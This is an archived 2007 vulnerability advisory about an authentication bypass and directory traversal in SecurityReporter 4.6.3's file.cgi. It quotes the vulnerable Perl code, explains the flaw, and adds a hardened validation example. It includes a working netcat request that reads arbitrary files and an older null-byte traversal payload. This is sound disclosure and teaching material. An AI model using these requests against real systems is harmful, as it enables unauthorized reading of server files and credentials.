
securityreporter-traverse.txt

Posted Jul 24, 2007
Authored by Oliver Karow | Site oliverkarow.de

SecurityReporter version 4.6.3 from Secure Computing suffers from an authentication bypass and directory traversal vulnerability.

tags | exploit, file inclusion
SHA-256 | f4901ba96169fe7851bc008d68821446e8d148ac28c43703ca3180cbe68dbde8

SECURITYREPORTER - AUTHENTICATION BYPASS AND DIRECTORY TRAVERSAL VULNERABILITY

Product: SecurityReporter
Version: 4.6.3 Build Date: 04/20/2007
Platform: Win32
Vendor: Secure Computing (www.securecomputing.com)

Product Description
-------------------

"SecurityReporter is a security event analysis and reporting solution
for the Sidewinder Security Appliance, providing realtime security
intelligence to help decipher hacker/virus behavior, combat security
threats, and help meet compliance requirements."

Vendor Description
------------------

SecurityReporter is manufactured under an OEM partnership between
Secure Computing and eIQnetworks. The product is also known as "Network
Security Analyzer". According to eIQnetworks, Security Analyzer is also
part of products of the following companies:

- Top Layer Networks
- Clavister
- Astaro
- Reflex Security
- H3C
- Piolink
- MiraPoint


Vulnerability-Overview
----------------------

SecurityReporter is vulnerable to an authentication bypass and directory
traversal attack.
It is possible to access files inside and outside the application root
directory remotely without authentication.

During installation, SecurityReporter offers a choice between a
dedicated Apache installation (which is included in the install
package) and the use of a pre-installed Internet Information Server.

With the bundled Apache, access to the files is performed with local
system account privileges by default.


Exploitation
------------

The following request fetches the source code of the script itself, but
can also be used to access any other file on the partition:

echo -e "GET /cgi-bin/file.cgi?name=/eventcache/../cgi-bin/file.cgi HTTP/1.0\r\n\r\n" | nc <ip> <port>


Vulnerability Details
---------------------

The authentication can be bypassed because of the following code within
"file.cgi":

 8 $name = $field{'name'};
 9
10 #for gif images we dont care about authorization so just serve it without
11 #bothering the reporting engine again. See bug: 3676 for details.
12 $dontvalidate = "false";
13 if ($name =~ /^[a-zA-Z0-9\-\. _\/ ]+\.(gif)$/) {
14     $dontvalidate = "true";
15     print "Content-Type: image/gif\n";
16     binmode STDOUT;
17 }
18 elsif ($name =~ /^\/eventcache\//) {
19     $dontvalidate = "true";
20     print "Content-Type: text/html\n";
21     binmode STDOUT;
22 }

If the value of the parameter "name" does not match the regex in line 13
(which can be enforced by not requesting a ".gif" file), the condition in
line 18 is checked.
If the value of "name" starts with the directory "/eventcache/",
$dontvalidate is set to "true", thus disabling user validation.

(Addition: in older versions of this application, the regex in line 13
could be bypassed with a null-byte attack, by requesting a file like
../../../../boot.ini%00.gif. This is fixed in the current version
within the file GeneralUtilities.pm, which is included by most .pl files.)

The directory traversal is possible because there is no normalization of
the input and no filtering of dots and slashes/backslashes within
"file.cgi":

#on windows 2003 IIS the cur dir is the root itself- dont know why so we try to open it in
#path relative to root if ../ from cgi-bin fails
open(f, "../$name") or open(f, "$name") or die "File ($name): $!";
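
A hardened form of the two checks quoted above, as an added example that is not the vendor's patch or code from the advisory: the name is normalized first, and validation is skipped only if the result is still inside /eventcache/. The function names normalize_name and may_skip_validation are hypothetical, the sample inputs are constructed, and $name is assumed to have been URL-decoded once by the CGI layer.

```perl
#!/usr/bin/perl
# Added example (hypothetical helper names, not the vendor's fix).
# Assumes $name is already URL-decoded, as $field{'name'} is in file.cgi.
use strict;
use warnings;

# Collapse "." and ".." lexically; return undef if the path must be rejected.
sub normalize_name {
    my ($name) = @_;
    return undef unless defined $name && length $name;
    return undef if $name =~ /\0/;          # null byte, e.g. "%00.gif" after decoding
    $name =~ tr{\\}{/};                     # backslash is a separator on Win32
    return undef if $name =~ /^[A-Za-z]:/;  # drive-qualified path
    my @out;
    for my $seg (split m{/+}, $name) {
        next if $seg eq '' || $seg eq '.';
        if ($seg eq '..') {
            return undef unless @out;       # would climb above the root
            pop @out;
            next;
        }
        push @out, $seg;
    }
    return '/' . join('/', @out);
}

# True only if the normalized path is still a file below /eventcache/.
# The caller should then open the normalized path under a fixed
# application root, never the raw $name.
sub may_skip_validation {
    my ($name) = @_;
    my $clean = normalize_name($name);
    return 0 unless defined $clean;
    return $clean =~ m{^/eventcache/[^/]} ? 1 : 0;
}

# Constructed sample inputs: one legitimate name, three that must not
# be served without user validation.
for my $name ('/eventcache/report1.html',
              '/eventcache/../cgi-bin/file.cgi',
              '/eventcache/..\\cgi-bin\\file.cgi',
              "/eventcache/a.html\0.gif") {
    (my $shown = $name) =~ s/\0/\\0/g;
    printf "%-40s skip validation: %s\n",
        $shown, may_skip_validation($name) ? 'yes' : 'no';
}
```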


PATCH
-----

All SecurityReporter customers have been sent an email by the vendor,
describing the vulnerability with a link to a patch.

Discovered
----------

By Oliver Karow (oliver.karow@gmx.de) on Tuesday, 05. June 2007
http://www.oliverkarow.de/research/securityreporter.txt

